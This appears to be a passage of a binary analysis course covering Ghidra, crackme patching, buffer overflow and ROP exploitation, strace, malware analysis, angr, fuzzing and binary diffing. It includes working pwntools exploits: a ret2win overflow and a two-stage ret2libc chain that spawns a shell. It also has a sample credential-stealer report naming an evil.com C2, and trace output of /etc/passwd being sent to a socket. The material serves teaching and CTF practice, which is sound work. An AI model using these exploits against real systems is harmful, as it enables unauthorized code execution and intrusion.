Real world outcome:

Analyzing a CTF crackme in Ghidra:

1. Load binary → Auto-analysis runs
2. Find main() → Entry point analysis
3. Decompile main() → See C-like code:

   int main(int argc, char **argv) {
       char input[32];
       printf("Enter password: ");
       scanf("%s", input);
       if (check_password(input)) {
           printf("Correct!\n");
       } else {
           printf("Wrong!\n");
       }
       return 0;
   }

4. Analyze check_password() → Find algorithm
5. Write keygen or patch binary

Implementation Hints:

Ghidra workflow:

  1. Create project → Import binary
  2. Let auto-analysis complete
  3. Navigate with ‘G’ (goto address) or symbol tree
  4. Use ‘L’ to rename functions/variables
  5. Use ‘;’ to add comments
  6. Use Ctrl+Shift+F (References → Show References to) to find cross-references

Scripting example (Ghidra Python):

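# Find all calls to dangerous functions.
# Uses % formatting so it also runs under Ghidra's bundled Jython 2.7,
# which does not support f-strings.
dangerous = ["gets", "strcpy", "sprintf"]
for func_name in dangerous:
    func = getFunction(func_name)  # None if no function has this name
    if func:
        refs = getReferencesTo(func.getEntryPoint())
        for ref in refs:
            if ref.getReferenceType().isCall():  # skip data references
                print("Call to %s at %s" % (func_name, ref.getFromAddress()))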

Learning milestones:

  1. Navigate efficiently → Find functions, strings, imports
  2. Understand decompiler output → Read C-like code
  3. Rename and annotate → Make code understandable
  4. Write scripts → Automate repetitive analysis

Project 6: Crackme Challenges

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Assembly analysis, Python for keygens
  • Alternative Programming Languages: Any
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Reverse Engineering / Password Bypass
  • Software or Tool: Ghidra, GDB, crackmes.one
  • Main Book: “Reversing: Secrets of Reverse Engineering” by Eldad Eilam

What you’ll build: Solve 10+ crackme challenges of increasing difficulty, learning patching, keygen writing, and anti-debugging bypass.

Why it teaches binary analysis: Crackmes are purpose-built learning tools. They teach you to find and understand password checks, then bypass them.

Core challenges you’ll face:

  • Finding the check → maps to string references, control flow
  • Understanding the algorithm → maps to decompilation, debugging
  • Patching vs keygen → maps to two approaches to bypass
  • Anti-debugging → maps to detection evasion

Key Concepts:

  • Patching: Tutorial #10 - The Levels of Patching
  • Keygen Writing: “Reversing” Ch. 5 - Eilam
  • Anti-Debugging Bypass: OpenRCE Anti-Reversing Database

  • Difficulty: Intermediate
  • Time estimate: 2-4 weeks
  • Prerequisites: Projects 4-5 (GDB, Ghidra)

Real world outcome:

# Approach 1: Patching
$ ./crackme
Enter password: wrong
Access Denied!

# Found the check: JNE (jump if not equal) to fail
# Patch JNE to JE (or NOP it out)
$ xxd -g 1 -s 0x1234 -l 2 crackme
00001234: 75 28  # JNE +0x28
$ printf '\x90\x90' | dd of=crackme bs=1 seek=4660 conv=notrunc
$ ./crackme
Enter password: anything
Access Granted!

# Approach 2: Keygen
# Found algorithm: password = (username XOR 0x55) + 0x1337
$ python3 keygen.py "admin"
Valid password for 'admin': 0xAB12CD34

Implementation Hints:

Systematic approach:

  1. Run the binary to understand expected behavior
  2. Find strings (“Enter password”, “Access Denied”)
  3. Find cross-references to those strings
  4. Trace backwards to find the comparison
  5. Understand what makes it pass
  6. Either patch the jump or write a keygen

Patching levels:

  1. LAME: NOP out the check entirely
  2. Better: Invert the jump condition
  3. Good: Patch the comparison to always succeed
  4. Best: Understand algorithm, write keygen
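
Level 2 (inverting the jump) can be done without dd. For short conditional jumps, JE is opcode 0x74 and JNE is 0x75, so flipping the lowest bit of the opcode inverts the condition and leaves the displacement byte alone. The sketch below works on an in-memory copy of the file; the function name and the sample bytes are illustrative.

```python
JE_SHORT, JNE_SHORT = 0x74, 0x75

def invert_short_jump(image: bytearray, offset: int) -> None:
    """Turn a short JE into JNE (or the reverse) at the given file offset."""
    opcode = image[offset]
    if opcode not in (JE_SHORT, JNE_SHORT):
        raise ValueError("no short JE/JNE at offset 0x%x" % offset)
    image[offset] = opcode ^ 1   # 0x74 <-> 0x75; displacement is untouched

# test eax, eax ; jne +0x28 ; nop
code = bytearray(b"\x85\xc0\x75\x28\x90")
invert_short_jump(code, 2)
print(code.hex())
# prints: 85c0742890
```

Checking the opcode before writing guards against patching the wrong offset. To patch a real file, read it into a bytearray, apply the function, and write the result to a new file so the original stays intact.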

Questions:

  • What’s the difference between JE and JNE?
  • How do you find the password comparison in decompiled code?
  • What are common string comparison functions?

Learning milestones:

  1. Solve easy crackmes → Find obvious password checks
  2. Understand algorithms → XOR, hashing, encoding
  3. Write keygens → Reverse the algorithm
  4. Bypass protections → Handle obfuscation

Project 7: Buffer Overflow Exploitation

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C (targets), Python (exploits)
  • Alternative Programming Languages: Assembly for shellcode
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Binary Exploitation / Memory Corruption
  • Software or Tool: GDB, pwntools, checksec
  • Main Book: “Hacking: The Art of Exploitation” by Jon Erickson

What you’ll build: Working exploits for buffer overflow vulnerabilities, progressing from simple stack smashing to bypassing ASLR and stack canaries.

Why it teaches binary analysis: Understanding exploitation gives you insight into why security mitigations exist and how low-level memory works.

Core challenges you’ll face:

  • Finding the offset → maps to pattern generation, EIP/RIP control
  • Controlling execution → maps to return address overwrite
  • Bypassing NX → maps to return-to-libc, ROP
  • Bypassing ASLR → maps to info leaks, partial overwrite

Key Concepts:

  • Stack Layout: “Hacking: Art of Exploitation” Ch. 2
  • Shellcode: “Hacking: Art of Exploitation” Ch. 5
  • Return-Oriented Programming: “Practical Binary Analysis” Ch. 10

  • Difficulty: Advanced
  • Time estimate: 3-4 weeks
  • Prerequisites: Projects 1-6, solid C and assembly

Real world outcome:

from pwn import *

# Start the target as a local process
p = process('./vulnerable')

# Offset to the saved return address (found with a cyclic pattern):
# 64-byte buffer + 8-byte saved RBP
offset = 72

# Build payload
payload = b'A' * offset           # Fill buffer
payload += p64(0x401337)          # Overwrite return address with win()

# Send payload
p.sendline(payload)

# Get shell!
p.interactive()

# Output:
# [*] Switching to interactive mode
# $ whoami
# root
# $ cat flag.txt
# FLAG{buffer_overflow_mastered}

Implementation Hints:

Progression:

  1. ret2win: Overwrite return address to call win() function
  2. ret2shellcode: Jump to shellcode on stack (no NX)
  3. ret2libc: Return to system("/bin/sh") (bypass NX)
  4. ROP chain: Chain gadgets for complex operations
  5. GOT overwrite: Hijack function pointers
  6. Format string: Arbitrary read/write

Finding offset:

from pwn import *

# Generate cyclic pattern
pattern = cyclic(200)
# Feed to program, get crash address
# Use cyclic_find to get offset
offset = cyclic_find(0x61616168)  # 'haaa' in little-endian

Key questions:

  • How do you find the offset to the return address?
  • What’s the difference between 32-bit and 64-bit exploitation?
  • How do you find useful libc functions when ASLR is enabled?

Learning milestones:

  1. Control EIP/RIP → Overwrite return address
  2. Execute shellcode → Spawn a shell (no NX)
  3. ROP chains → Bypass NX with gadgets
  4. Leak addresses → Bypass ASLR

Project 8: Return-Oriented Programming (ROP)

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python (pwntools)
  • Alternative Programming Languages: Assembly understanding
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 4: Expert
  • Knowledge Area: Advanced Exploitation / Code Reuse
  • Software or Tool: ROPgadget, ropper, pwntools
  • Main Book: “The Shellcoder’s Handbook”

What you’ll build: Complex ROP chains that bypass NX protection by chaining together code snippets already in the binary.

Why it teaches binary analysis: ROP is the foundation of modern exploitation. It demonstrates deep understanding of calling conventions and code reuse.

Core challenges you’ll face:

  • Finding gadgets → maps to instruction sequences ending in ret
  • Chaining gadgets → maps to building functionality from fragments
  • Setting up arguments → maps to calling conventions (rdi, rsi, rdx)
  • Calling system() → maps to executing /bin/sh

Resources for key challenges:

Key Concepts:

  • Gadget Types: “The Shellcoder’s Handbook” Ch. 9
  • x64 Calling Convention: System V ABI
  • Stack Pivoting: ROP Emporium tutorials

Difficulty: Expert · Time estimate: 2-3 weeks · Prerequisites: Project 7 (Buffer Overflow)

Real world outcome:

from pwn import *

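elf = context.binary = ELF('./target')  # Also makes flat() pack 64-bit values
libc = ELF('./libc.so.6')
rop = ROP(elf)
p = process('./target')
offset = 72                             # Example value; find yours as in Project 7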

# Find gadgets
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
ret = rop.find_gadget(['ret'])[0]

# Leak libc address
payload = flat(
    b'A' * offset,
    pop_rdi,
    elf.got['puts'],    # Argument: puts@GOT
    elf.plt['puts'],    # Call puts to leak
    elf.symbols['main'] # Return to main for second stage
)

p.sendline(payload)
leaked = u64(p.recv(6).ljust(8, b'\x00'))
libc.address = leaked - libc.symbols['puts']

# Second stage: call system("/bin/sh")
bin_sh = next(libc.search(b'/bin/sh'))
system = libc.symbols['system']

payload2 = flat(
    b'A' * offset,
    ret,                # Stack alignment
    pop_rdi,
    bin_sh,
    system
)

p.sendline(payload2)
p.interactive()

Implementation Hints:

Gadget hunting:

$ ROPgadget --binary ./target | grep "pop rdi"
0x00401233 : pop rdi ; ret
$ ROPgadget --binary ./target | grep "pop rsi"
0x00401231 : pop rsi ; pop r15 ; ret
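
Gadget finders work on raw bytes, not on the instruction boundaries the compiler intended. The sketch below is a simplified stand-in for ROPgadget (it only does a byte search, with no disassembly) and uses a hypothetical five-byte code fragment to show how `pop rdi ; ret` can be found in the middle of `pop r15 ; ret`.

```python
POP_RDI_RET = bytes.fromhex('5fc3')      # pop rdi ; ret
POP_RSI_POP_R15_RET = bytes.fromhex('5e415fc3')  # pop rsi ; pop r15 ; ret


def find_gadget(code: bytes, pattern: bytes, base: int = 0):
    """Return every address (base + offset) where the byte pattern occurs."""
    hits = []
    pos = code.find(pattern)
    while pos != -1:
        hits.append(base + pos)
        pos = code.find(pattern, pos + 1)
    return hits


# Hypothetical function epilogue: pop r14 ; pop r15 ; ret  (41 5e 41 5f c3)
code = bytes.fromhex('415e415fc3')
base = 0x401230  # assumed load address of this fragment

print([hex(a) for a in find_gadget(code, POP_RDI_RET, base)])          # ['0x401233']
print([hex(a) for a in find_gadget(code, POP_RSI_POP_R15_RET, base)])  # ['0x401231']
```

Skipping the `41` prefix byte turns `pop r15` into `pop rdi` and `pop r14` into `pop rsi`, which is why useful gadgets show up at addresses that never appear in a normal disassembly listing.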

Common ROP patterns:

  1. Leak libc: Call puts(GOT_entry) to leak address
  2. Calculate libc base: leaked_addr - offset = libc_base
  3. Find /bin/sh: Search libc for “/bin/sh” string
  4. Call system: pop rdi; ret + “/bin/sh” addr + system addr
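
Steps 1 and 2 come down to a little arithmetic on the leaked bytes. The sketch below shows it with the standard library only; the symbol offsets and the leaked bytes are made-up example values (real ones come from the target's libc), and the page-alignment check is a common sanity test rather than a guarantee.

```python
def parse_leak(raw: bytes) -> int:
    """Turn the bytes printed by puts() into an integer (little-endian, zero-padded)."""
    return int.from_bytes(raw.ljust(8, b'\x00'), 'little')


def libc_base(leaked_addr: int, symbol_offset: int) -> int:
    """Compute the libc load address and sanity-check that it is page-aligned."""
    base = leaked_addr - symbol_offset
    if base & 0xfff:
        raise ValueError(f'base {base:#x} is not page-aligned; wrong libc or bad leak')
    return base


# Hypothetical values for illustration only
PUTS_OFFSET = 0x80e50
SYSTEM_OFFSET = 0x50d70
raw_leak = bytes.fromhex('500e58f7ff7f')   # 6 bytes, as puts() stops at the first NUL

leaked = parse_leak(raw_leak)
base = libc_base(leaked, PUTS_OFFSET)
print(hex(leaked))                 # 0x7ffff7580e50
print(hex(base))                   # 0x7ffff7500000
print(hex(base + SYSTEM_OFFSET))   # 0x7ffff7550d70
```

A base that does not end in `000` usually means the wrong libc version or a leak that picked up stray output.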

Stack alignment:

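  • The System V x86-64 ABI requires rsp to be 16-byte aligned at the point of every call instruction
  • If system() crashes (typically on a movaps instruction), add one ret gadget before it to shift rsp by 8 bytes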
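
The alignment rule is easy to check by hand. At function entry the return address has already been pushed, so a correctly aligned call leaves `rsp + 8` as a multiple of 16. The sketch below encodes that check; the `rsp` value is a hypothetical number you would read from a debugger at the first instruction of `system()`.

```python
def aligned_at_entry(rsp: int) -> bool:
    """True if rsp at function entry matches what a normal call would produce."""
    return (rsp + 8) % 16 == 0


RET_GADGET_SHIFT = 8  # each extra 'ret' consumes one 8-byte stack slot

rsp_on_entry = 0x7ffd1000  # hypothetical value observed when the chain enters system()

print(aligned_at_entry(rsp_on_entry))                     # False
print(aligned_at_entry(rsp_on_entry + RET_GADGET_SHIFT))  # True
```

One extra `ret` is enough because the stack can only be off by 8 in a chain made of 8-byte slots.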

Learning milestones:

  1. Find gadgets → Use ROPgadget or ropper
  2. Chain simple ROP → Control function arguments
  3. Leak libc → Bypass ASLR
  4. Get shell → Complete exploitation chain

Project 9: Dynamic Analysis with strace/ltrace

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Command line tools
  • Alternative Programming Languages: Python for automation
  • Coolness Level: Level 2: Practical but Forgettable
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 1: Beginner
  • Knowledge Area: Dynamic Analysis / System Calls
  • Software or Tool: strace, ltrace, Linux
  • Main Book: “The Linux Programming Interface” by Michael Kerrisk

What you’ll build: A workflow for analyzing unknown binaries using only system call and library call tracing, without disassembly.

Why it teaches binary analysis: Sometimes you don’t need disassembly. Seeing what files a program opens and what APIs it calls reveals a lot.

Core challenges you’ll face:

  • Understanding syscall output → maps to knowing what each syscall does
  • Filtering noise → maps to focusing on interesting calls
  • Following child processes → maps to fork/exec tracing
  • Interpreting library calls → maps to understanding libc functions

Resources for key challenges:

Key Concepts:

  • System Calls: “The Linux Programming Interface” Ch. 3
  • Library Calls: ltrace man page
  • Process Tracing: strace man page

Difficulty: Beginner · Time estimate: 3-5 days · Prerequisites: Basic Linux command line

Real world outcome:

$ strace -f ./suspicious_binary 2>&1 | head -50
execve("./suspicious_binary", ...) = 0
openat(AT_FDCWD, "/etc/passwd", O_RDONLY) = 3   # Reading password file!
read(3, "root:x:0:0:...", 4096) = 2847
close(3)
socket(AF_INET, SOCK_STREAM, 0) = 4              # Opening socket!
connect(4, {sa_family=AF_INET, sin_port=htons(1337),
        sin_addr=inet_addr("10.0.0.1")}, 16) = 0  # Connecting to C2!
write(4, "root:x:0:0:...", 2847) = 2847          # Exfiltrating data!

$ ltrace ./crackme
__libc_start_main(...)
puts("Enter password: ")
fgets("test\n", 100, stdin)
strlen("test\n") = 5
strcmp("test", "s3cr3t_p4ss") = 1                # Password revealed!
puts("Wrong!")

Implementation Hints:

Useful strace options:

strace -f          # Follow child processes
strace -e trace=openat   # Only trace openat() calls (modern libc opens files this way)
strace -e trace=file     # All file-related calls
strace -e trace=network  # All network-related calls
strace -s 1000     # Show 1000 chars of strings
strace -o log.txt  # Output to file
strace -p PID      # Attach to running process

Useful ltrace options:

ltrace -e strcmp   # Only trace strcmp
ltrace -e '*'      # All library calls
ltrace -C          # Demangle C++ names
ltrace -n 2        # Indent nested calls by 2 spaces per level

Analysis workflow:

  1. Run with strace to see syscalls
  2. Run with ltrace to see library calls
  3. Look for interesting patterns:
    • File operations (what does it read/write?)
    • Network operations (where does it connect?)
    • String comparisons (password checks?)
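
Step 3 can be partly automated once a trace is saved with `strace -o`. The following is a rough sketch, not a full strace parser: it assumes each syscall is on a single line in the default output format, and the function name `flag_interesting` is made up for this example.

```python
import re

# name(args) = return_value, optionally prefixed by "[pid N]" when -f is used
SYSCALL_RE = re.compile(r'^(?:\[pid\s+\d+\]\s+)?(\w+)\((.*)\)\s+=\s+(-?\d+)')


def flag_interesting(lines):
    """Collect opened file paths and connect() destinations from strace lines."""
    findings = []
    for line in lines:
        m = SYSCALL_RE.match(line)
        if not m:
            continue
        name, args, ret = m.group(1), m.group(2), int(m.group(3))
        if name in ('open', 'openat') and ret >= 0:
            path = re.search(r'"([^"]*)"', args)
            if path:
                findings.append(('file', path.group(1)))
        elif name == 'connect':
            addr = re.search(r'inet_addr\("([^"]+)"\)', args)
            port = re.search(r'htons\((\d+)\)', args)
            if addr and port:
                findings.append(('network', f'{addr.group(1)}:{port.group(1)}'))
    return findings


sample = [
    'openat(AT_FDCWD, "/etc/passwd", O_RDONLY) = 3',
    'read(3, "root:x:0:0:...", 4096) = 2847',
    'connect(4, {sa_family=AF_INET, sin_port=htons(1337), '
    'sin_addr=inet_addr("10.0.0.1")}, 16) = 0',
]
for kind, detail in flag_interesting(sample):
    print(kind, detail)
```

On a real log you would pass `open('log.txt')` instead of the sample list and extend the rules as new patterns turn up.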

Learning milestones:

  1. Trace basic program → Understand output format
  2. Find password checks → strcmp/memcmp in ltrace
  3. Trace network activity → socket/connect/send
  4. Analyze malware behavior → Without disassembly

Project 10: Malware Analysis Lab

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Assembly analysis, Python
  • Alternative Programming Languages: PowerShell (Windows malware)
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 3. The “Service & Support” Model
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Malware Analysis / Threat Intelligence
  • Software or Tool: REMnux, FLARE-VM, Ghidra, x64dbg
  • Main Book: “Practical Malware Analysis” by Sikorski & Honig

What you’ll build: A complete malware analysis workflow, from safe environment setup to behavioral analysis, static analysis, and report writing.

Why it teaches binary analysis: Malware analysis is one of the most practical applications of binary analysis. It combines all skills: file formats, assembly, debugging, and behavioral analysis.

Core challenges you’ll face:

  • Safe environment → maps to VMs, network isolation
  • Behavioral analysis → maps to what does it do when run?
  • Static analysis → maps to understanding without running
  • Anti-analysis bypass → maps to detecting/evading protections

Resources for key challenges:

Key Concepts:

  • Safe Environment Setup: “Practical Malware Analysis” Ch. 2
  • Behavioral Analysis: “Practical Malware Analysis” Ch. 3
  • Anti-Debugging Techniques: OpenRCE Database

Difficulty: Advanced · Time estimate: 4-6 weeks · Prerequisites: Projects 1-9, strong Windows/Linux knowledge

Real world outcome:

# Malware Analysis Report: suspicious.exe

## Executive Summary
The sample is a credential stealer that exfiltrates browser passwords
to a C2 server at 192.168.1.100:443.

## Static Analysis
- File Type: PE32+ executable (x64)
- Compiler: MSVC 2019
- Imports: WinInet (HTTP), Crypt32 (decryption), Advapi32 (registry)
- Packed: UPX 3.96 (unpacked for analysis)
- Strings:
  - "Chrome\\User Data\\Default\\Login Data"
  - "Mozilla\\Firefox\\Profiles"
  - "https://c2.evil.com/upload"

## Behavioral Analysis
1. Creates mutex "Global\\{GUID}" (prevents multiple instances)
2. Achieves persistence via Run key
3. Reads browser credential databases
4. Encrypts data with XOR key 0x37
5. Exfiltrates via HTTPS POST

## IOCs
- Mutex: Global\\{12345678-1234-...}
- C2: 192.168.1.100:443
- User-Agent: "Mozilla/5.0 Custom"
- File: %APPDATA%\\svchost.exe

## YARA Rule
rule credential_stealer {
    strings:
        $s1 = "Login Data" ascii
        $s2 = "cookies.sqlite" ascii
        $c2 = "192.168.1.100" ascii
    condition:
        2 of them
}

Implementation Hints:

Analysis workflow:

  1. Triage: File type, hashes, VirusTotal check
  2. Environment Setup: Isolated VM with snapshots
  3. Behavioral Analysis:
    • Process Monitor (Windows) / strace (Linux)
    • Network capture (Wireshark, fakenet-ng)
    • Registry changes, file system changes
  4. Static Analysis:
    • Strings, imports, exports
    • Unpack if packed
    • Disassemble/decompile key functions
  5. Dynamic Analysis:
    • Debug with x64dbg/GDB
    • Set breakpoints on interesting APIs
    • Dump decrypted data
  6. Report Writing: Document findings with IOCs
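
The triage step usually starts with hashing the sample so it can be looked up and referenced in the report. A minimal sketch with the standard library follows; `file_hashes` is an illustrative name, and the temporary file merely stands in for a real sample.

```python
import hashlib
import os
import tempfile


def file_hashes(path: str, chunk_size: int = 65536) -> dict:
    """Compute SHA-1 and SHA-256 of a file without loading it all into memory."""
    sha1, sha256 = hashlib.sha1(), hashlib.sha256()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(chunk_size), b''):
            sha1.update(chunk)
            sha256.update(chunk)
    return {'sha1': sha1.hexdigest(), 'sha256': sha256.hexdigest()}


# Throwaway file standing in for a sample (never hash-and-run real malware on a host machine)
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b'MZ' + b'\x00' * 62)
    sample_path = tmp.name

hashes = file_hashes(sample_path)
os.remove(sample_path)
print(hashes['sha256'])
```

Reading in chunks keeps memory use flat even for large samples or memory dumps.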

Anti-analysis techniques to watch for:

  • IsDebuggerPresent() checks
  • Timing checks (RDTSC)
  • VM detection (CPUID, registry checks)
  • Anti-disassembly tricks

Learning milestones:

  1. Set up safe lab → Isolated analysis environment
  2. Behavioral analysis → Understand without disassembly
  3. Static analysis → Reverse engineer core functionality
  4. Write reports → Document findings professionally

Project 11: Symbolic Execution with angr

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: None (angr is Python-only)
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 4: Expert
  • Knowledge Area: Program Analysis / Constraint Solving
  • Software or Tool: angr framework, Python 3
  • Main Book: angr documentation

What you’ll build: Scripts that use symbolic execution to automatically find inputs that reach specific program states, solving CTF challenges and finding bugs.

Why it teaches binary analysis: Symbolic execution represents the frontier of automated program analysis. It finds paths humans might miss.

Core challenges you’ll face:

  • Setting up states → maps to defining where to start
  • Avoiding path explosion → maps to constraining exploration
  • Finding target addresses → maps to what state do you want?
  • Extracting solutions → maps to getting concrete inputs

Resources for key challenges:

Key Concepts:

  • Symbolic State: angr docs - Core Concepts
  • Exploration Techniques: angr docs - Simulation
  • Constraint Solving: Z3 solver basics

Difficulty: Expert · Time estimate: 2-3 weeks · Prerequisites: Projects 1-8, Python proficiency

Real world outcome:

import angr
import claripy

# Load binary
proj = angr.Project('./crackme', auto_load_libs=False)

# Create symbolic input (32 bytes)
password = claripy.BVS('password', 32 * 8)

# Create initial state at entry point
state = proj.factory.entry_state(
    args=['./crackme'],
    stdin=angr.SimFile('/dev/stdin', content=password)
)

# Create simulation manager
simgr = proj.factory.simulation_manager(state)

# Explore: find 'success', avoid 'failure'
simgr.explore(
    find=lambda s: b"Correct" in s.posix.dumps(1),
    avoid=lambda s: b"Wrong" in s.posix.dumps(1)
)

# Extract solution
if simgr.found:
    solution = simgr.found[0].solver.eval(password, cast_to=bytes)
    print(f"Password: {solution.decode()}")
else:
    print("No solution found")

# Output:
# Password: sup3r_s3cr3t_k3y

Implementation Hints:

angr workflow:

  1. Load binary with angr.Project()
  2. Create symbolic variables with claripy.BVS()
  3. Create initial state with factory.entry_state()
  4. Create simulation manager with factory.simulation_manager()
  5. Explore with simgr.explore(find=..., avoid=...)
  6. Extract solution with solver.eval()
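
The last step, asking a solver for a concrete input, can be illustrated without angr. The toy below is not symbolic execution: the constraints for the "success" path of a hypothetical crackme are written by hand, and a brute-force search over byte values plays the role that the Z3 solver plays inside angr.

```python
# Hypothetical check: input is accepted when ((byte ^ 0x37) + index) & 0xff == TARGET[index]
TARGET = bytes([0x5c, 0x53, 0x50])


def success_path_constraints():
    """One predicate per input byte, as would be collected along the accepting path."""
    return [
        (lambda b, i=i, t=t: ((b ^ 0x37) + i) & 0xff == t)
        for i, t in enumerate(TARGET)
    ]


def solve(constraints):
    """Find a concrete byte for each constraint, or None if the path is unsatisfiable."""
    solution = bytearray()
    for constraint in constraints:
        candidates = [b for b in range(256) if constraint(b)]
        if not candidates:
            return None
        solution.append(candidates[0])
    return bytes(solution)


print(solve(success_path_constraints()))  # b'key'
```

A real engine derives the constraints automatically from the binary and solves them jointly, which is what makes it practical when bytes depend on each other.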

Tips for avoiding path explosion:

  • Use avoid to skip irrelevant paths
  • Set memory limits on states
  • Use hooks to skip complex functions
  • Start exploration from specific addresses

Common patterns:

# Find by address
simgr.explore(find=0x401234, avoid=0x401111)

# Find by output string
simgr.explore(
    find=lambda s: b"WIN" in s.posix.dumps(1),
    avoid=lambda s: b"LOSE" in s.posix.dumps(1)
)

# Hook a function
@proj.hook(0x401000, length=5)
def skip_check(state):
    state.regs.eax = 1  # Always succeed

Learning milestones:

  1. Solve simple crackme → Basic symbolic execution
  2. Handle complex inputs → Symbolic arrays
  3. Use hooks → Skip annoying functions
  4. Solve CTF challenges → Real-world application

Project 12: Fuzzing with AFL++

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C (for harnesses), Shell
  • Alternative Programming Languages: Python (for orchestration)
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 3. The “Service & Support” Model
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Vulnerability Discovery / Fuzzing
  • Software or Tool: AFL++, libFuzzer, Address Sanitizer
  • Main Book: “The Fuzzing Book” (online)

What you’ll build: Fuzzing campaigns that automatically discover crashes and vulnerabilities in binary programs.

Why it teaches binary analysis: Fuzzing finds a large share of modern memory-safety vulnerabilities. Understanding fuzzing means understanding what makes programs crash.

Core challenges you’ll face:

  • Writing harnesses → maps to calling the target function
  • Preparing corpus → maps to good starting inputs
  • Triaging crashes → maps to which crashes are exploitable?
  • Binary-only fuzzing → maps to QEMU mode, Frida

Resources for key challenges:

Key Concepts:

  • Coverage-Guided Fuzzing: AFL++ docs
  • Sanitizers: LLVM sanitizer docs
  • Persistent Mode: AFL++ performance docs

Difficulty: Advanced · Time estimate: 2-3 weeks · Prerequisites: C programming, Projects 1-3

Real world outcome:

# Compile target with instrumentation
$ afl-gcc -o target target.c

# Prepare input corpus
$ mkdir in out
$ echo "test" > in/seed1

# Start fuzzing
$ afl-fuzz -i in -o out ./target @@

# AFL++ output:
#        american fuzzy lop ++4.00c
# ┌─ process timing ─────────────────────────────────────┐
# │        run time : 0 days, 0 hrs, 23 min, 45 sec      │
# │   last new find : 0 days, 0 hrs, 0 min, 12 sec       │
# ├─ overall results ────────────────────────────────────┤
# │  cycles done : 847                                   │
# │ corpus count : 234                                   │
# │saved crashes : 3 (!)                                 │   ← Found bugs!
# │  saved hangs : 0                                     │
# └──────────────────────────────────────────────────────┘

# Triage crashes
$ for crash in out/crashes/*; do
    ./target "$crash" 2>&1 | head -5
done

Implementation Hints:

Writing a harness:

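// For AFL++
#include <stdio.h>

void parse_input(char *buf, size_t len);  // Function under test, defined in the target

int main(int argc, char **argv) {
    if (argc < 2) return 1;

    FILE *f = fopen(argv[1], "rb");  // Binary mode: fuzz inputs are arbitrary bytes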
    if (!f) return 1;

    char buf[1024];
    size_t len = fread(buf, 1, sizeof(buf), f);
    fclose(f);

    // Call the function we want to fuzz
    parse_input(buf, len);
    return 0;
}

// For libFuzzer (compile as C++, or drop extern "C" when compiling as C)
#include <stddef.h>
#include <stdint.h>
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    parse_input((char*)data, size);
    return 0;
}

AFL++ modes:

  • Source mode: Compile with afl-gcc/afl-clang-fast
  • QEMU mode: Fuzz binaries without source (-Q flag)
  • Frida mode: Alternative for binary-only
  • Persistent mode: Faster fuzzing with loop
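
Whatever the mode, the core loop is the same: mutate an input, run the target, keep anything that crashes. The sketch below shows one mutation strategy, the walking bit flip, against a hypothetical Python stand-in for `parse_input`; it has no coverage feedback, so it illustrates only the mutate-and-run part of what AFL++ does.

```python
def walking_bitflips(seed: bytes):
    """Yield one mutated copy of the seed per bit, flipping bits left to right."""
    for i in range(len(seed) * 8):
        data = bytearray(seed)
        data[i // 8] ^= 0x80 >> (i % 8)
        yield bytes(data)


def parse_input(data: bytes) -> None:
    """Hypothetical target: simulates a crash on inputs starting with 'T'."""
    if data[:1] == b'T':
        raise ValueError('simulated crash')


def fuzz(seed: bytes):
    """Run every mutation through the target and collect crashing inputs."""
    crashes = []
    for candidate in walking_bitflips(seed):
        try:
            parse_input(candidate)
        except Exception:
            crashes.append(candidate)
    return crashes


crashes = fuzz(b'test')
print(crashes)  # [b'Test']
```

The seed `test` differs from the crashing input by a single bit (0x74 versus 0x54), which is why a good starting corpus matters: the closer the seeds are to interesting inputs, the fewer mutations are needed.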

Sanitizers (compile with these for better crash detection):

# Address Sanitizer (memory bugs)
clang -fsanitize=address,fuzzer target.c

# Undefined Behavior Sanitizer
clang -fsanitize=undefined,fuzzer target.c

Learning milestones:

  1. Fuzz simple target → Find obvious crashes
  2. Write custom harness → Fuzz specific functions
  3. Triage crashes → Determine exploitability
  4. Fuzz binary-only → No source code available

Project 13: Binary Diffing

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: Ghidra scripts
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 2. The “Micro-SaaS / Pro Tool”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Patch Analysis / Vulnerability Research
  • Software or Tool: BinDiff, Diaphora, Ghidriff
  • Main Book: N/A (tool documentation)

What you’ll build: A workflow for comparing two versions of a binary to find what changed, useful for understanding patches and finding 1-day vulnerabilities.

Why it teaches binary analysis: Comparing old and new versions reveals exactly what was fixed, helping you understand vulnerabilities.

Core challenges you’ll face:

  • Function matching → maps to identifying same function across versions
  • Diffing algorithms → maps to graph-based comparison
  • Finding security patches → maps to what was the vulnerability?
  • Interpreting results → maps to understanding the change

Resources for key challenges:

Key Concepts:

  • Function Matching: BinDiff documentation
  • Graph Isomorphism: Comparison algorithms
  • Patch Tuesday Analysis: Security research blogs

Difficulty: Intermediate · Time estimate: 1-2 weeks · Prerequisites: Project 5 (Ghidra)

Real world outcome:

# Using ghidriff
$ ghidriff libpng-1.6.39.so libpng-1.6.40.so -o diff_report

# Output:
# Modified Functions:
#   png_read_IDAT_data (similarity: 0.87)
#     - Added bounds check at 0x1234
#     - New comparison: if (length > max_size)
#
#   png_handle_chunk (similarity: 0.95)
#     - Additional validation in switch statement
#
# New Functions:
